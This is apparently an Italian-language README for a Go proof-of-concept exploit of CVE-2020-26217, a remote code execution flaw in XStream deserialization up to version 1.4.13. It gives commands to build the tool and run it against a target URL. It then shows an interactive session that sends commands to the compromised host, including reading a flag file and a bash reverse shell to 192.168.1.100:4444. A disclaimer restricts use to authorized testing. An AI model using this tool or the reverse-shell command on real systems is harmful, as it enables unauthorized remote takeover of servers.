
CVE-2020-26217 XStream poc di deserializzazione
Strumento di sfruttamento della vulnerabilità di esecuzione di codice remoto in XStream.
CVE-2020-26217 è una vulnerabilità di deserializzazione nella libreria XStream che consente a un attaccante di attivare l'esecuzione di codice remoto tramite dati XML dannosi.
Versioni interessate: XStream <= 1.4.13
go run poc.go <URL_target>
# Esecuzione dello strumento
go run poc.go http://target.com:8080/?data
# Dopo essere entrati in modalità interattiva, inserisci i comandi
cmd> whoami
cmd> cat /flag
cmd> bash -i >& /dev/tcp/192.168.1.100/4444 0>&1
cmd> exit
go build -o poc poc.go
Questo strumento è destinato esclusivamente alla ricerca sulla sicurezza e ai test autorizzati. Non utilizzarlo per scopi illegali. L'utente si assume la piena responsabilità legale.